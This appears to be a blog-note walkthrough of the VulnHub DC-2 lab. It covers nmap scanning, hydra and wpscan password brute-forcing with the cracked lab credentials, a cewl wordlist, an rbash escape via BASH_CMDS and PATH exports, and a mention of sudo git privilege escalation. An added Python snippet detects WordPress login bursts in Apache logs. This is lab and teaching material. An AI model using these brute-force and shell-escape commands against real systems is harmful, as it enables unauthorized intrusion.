DC2 of vulnhub

2022-06-10 23:03:00 Tianxia (Tianyan Master)

Summary: Brothers, you can head over to https://blog.csdn.net/shuteer_xu/article/details/116141639 and just read the master's write-up; I am only keeping this as a note.
The usual three steps: host discovery, port scanning, fingerprinting.
Host discovery

nmap -sS 192.168.43.0/24


Full port scan

nmap -A -p- 192.168.43.130


The scan shows that port 7744 is open and running SSH. I tried brute-forcing it with hydra:

hydra -L /opt/user.txt -P /opt/mima.txt ssh://192.168.43.130:7744

This attempt found no matching credentials.

Port 80 is Apache. nmap shows that it redirects to http://dc-2, so edit the /etc/hosts file and add the line 192.168.43.130 dc-2

Fingerprinting: whatweb identifies the site as WordPress. I tested it with wpscan; the scan did not find any vulnerability that could be exploited, so I tried enumerating user names.

Visiting the site in a browser shows a flag page, which says that cewl should be used to build a password dictionary. This command builds it:

cewl dc-2 > pass.txt

Three user names were found: admin, jerry, tom. I stored the three user names as user.txt and used wpscan to brute-force the passwords for the accounts:

wpscan --url http://dc-2/ -U user.txt -P pass.txt

It found:

 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

These are the matching user names and passwords.
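
Seen from the defender's side, the wpscan password run above appears in the Apache access log as a burst of POST requests to the WordPress login endpoints from one client. The following Python code is an added example, not part of the original post; the log lines, IP addresses, threshold and time window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-log fields needed: client IP, timestamp, method, path, status.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def detect_login_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"peak": n, "success_after_burst": bool}} for noisy clients.

    A failed wp-login.php POST answers 200 and a successful one 302, so a 302
    arriving after a burst suggests that a password was guessed.
    """
    recent = defaultdict(deque)          # ip -> timestamps inside the window
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                     # not an access-log record
        ip, ts, method, path, status = m.groups()
        path = path.split("?", 1)[0]
        if method != "POST" or path not in LOGIN_PATHS:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            hit = findings.setdefault(ip, {"peak": 0, "success_after_burst": False})
            hit["peak"] = max(hit["peak"], len(q))
        if ip in findings and path == "/wp-login.php" and status == "302":
            findings[ip]["success_after_burst"] = True
    return findings

def sample_lines():
    # Constructed log lines (not from the page): one noisy client, one normal user.
    rows = [("192.0.2.10", f"10/Jun/2022:22:00:{s:02d}", "200") for s in range(0, 12, 2)]
    rows.append(("192.0.2.10", "10/Jun/2022:22:00:13", "302"))
    rows.append(("192.0.2.77", "10/Jun/2022:22:00:05", "302"))
    return [f'{ip} - - [{ts} +0000] "POST /wp-login.php HTTP/1.1" {st} 1500 "-" "-"'
            for ip, ts, st in rows]

if __name__ == "__main__":
    for ip, info in detect_login_bursts(sample_lines()).items():
        print(ip, info)
```

An account flagged with success_after_burst should have its password reset and its sessions invalidated; requests to /xmlrpc.php always answer 200, so for that endpoint only the burst itself is visible.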

Trying to connect over SSH: the login as jerry was unsuccessful, the login as tom succeeded. Display the commands that this user can execute:

echo $PATH

echo /home/tom/usr/bin/*


This shows that the tom user can only use four commands: less, scp, ls, vi. The folder contains a flag3.txt file, which reminds us that we need to su to the jerry user.
But entering su jerry displays command not found. According to the boss's blog, this is rbash, which is a kind of permission control that makes it impossible for the user to execute certain commands, so rbash needs to be bypassed.

Using the commands from the boss's blog:

$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin


This bypasses rbash and makes it possible to switch users. Switch to the jerry user; next, privileges need to be escalated.
sudo -l shows which commands the current user can run as root.

It shows that git can be executed with sudo.
I looked up git privilege escalation commands. The master's blog gives two ways to escalate privileges with git. I used the first one and escalated successfully; the second one I could not get to work, probably because my ability is insufficient.
The following is the master's blog address:
https://blog.csdn.net/shuteer_xu/article/details/116141639
